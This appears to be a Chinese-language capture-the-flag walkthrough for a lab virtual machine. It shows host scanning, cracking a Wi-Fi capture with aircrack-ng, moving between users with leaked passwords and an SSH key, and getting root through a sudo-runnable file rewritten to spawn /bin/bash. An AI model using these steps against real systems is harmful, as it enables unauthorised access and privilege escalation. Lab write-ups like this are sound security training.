一、主机发现

arp-scan -l

得到靶机ip为192.168.55.155

二、拿到低权限账号

靶机就开放了22端口，去靶机页面一看，给出来了低权限的账号密码

ssh [email protected]

成功登陆

三、提权

3.1靶机信息收集

寻找定时任务

crontab -l

没找到定时任务

找一下suid命令

find / -perm  -4000 -print 2>/dev/null

发现该用户不能使用sudo命令

3.2登陆wytshadow用户

寻找可读可写可执行的文件

find / -type f -perm -0777 -print 2>/dev/null

利用scp命令将这两个文件下载到kali本地中

scp [email protected]:/var/log/.dist-manage/wytshadow.cap .
scp [email protected]:/.hints/lol/rofl/roflmao/this/isnt/gonna/stop/anytime/soon/still/going/lol/annoyed/almost/there/jk/no/seriously/last/one/rofl/ok/ill/stop/however/this/is/fun/ok/here/rofl/sorry/you/made/it/gold_star.txt .

其中这个txt文件看着像字典

这个cap文件用wireshark打开

这不是常规的通讯数据包，其中的802.11是无线协议通信

尝试进行爆破

aircrack-ng -w gold star.txt wytshadow.cap

成功爆破出来了密码

尝试登陆wytshadow用户

ssh [email protected]
gaUoCe34t1

成功登陆

3.3登陆genphlux用户

发现可以使用nginx命令

启动一下nginx服务试试

sudo service nginx start
systemctl status nginx.service

使用namp扫描一下端口，看看nginx开放的是哪个端口

nmap --min-rate 10000 -p- 192.168.55.155

发现是8080端口开放

使用火狐浏览器访问

发现访问不到

寻找配置文件查看原因

在/etc/nginx/sites-available目录下的default文件找到了答案

需要使用lynx进行查看

注：

lynx：是一个文本模式的网页浏览器

安装lynx

sudo apt-get install lynx

查看网页信息

lynx http://192.168.55.155:8080

又找到了一个账户

genphlux
HF9nd0cR!

使用该账户进行登陆

ssh [email protected]
HF9nd0cR!

发现该用户可以使用apache2

启动apache2后，发现80端口打开

火狐还是访问不到

试试lynx

也没有访问到信息

继续信息收集了

3.4登陆maleus用户

在该用户目录下找到了ssh私钥

尝试登陆

先将该密钥下载到kali本机中

scp [email protected]:/home/genphlux/maleus .

登陆maleus用户

chmod 600 maleus
ssh -i maleus [email protected]

继续进行信息收集

在.viminfo中找到了密码信息：B^slc8I$

3.5提权

继续查找sudo命令

此文件就在该用户的目录下

此时我们要做的就是修改该文件的内容，将提权语句插入其中

mv dont_even_bother dont_even_bother.c

然后编辑该文件

int main ()
{
       system("/bin/bash");
}

编译该文件

gcc -o dont_even_bother dont_even_bother.c

报错了，让我们加入参数

gcc -o dont_even_bother dont_even_bother.c -Wno-implicit-function-declaration
注：
-Wno-implicit-function-declaration 是 GCC 编译器的一个选项，其作用是关闭 “隐式函数声明” 的警告。当你在编译命令里添加这个选项后，编译器在遇到隐式声明的函数时，就不会再发出警告。所以，使用这个命令编译时，之前的警告信息将不会再显示。

然后执行该文件即可

成功提权！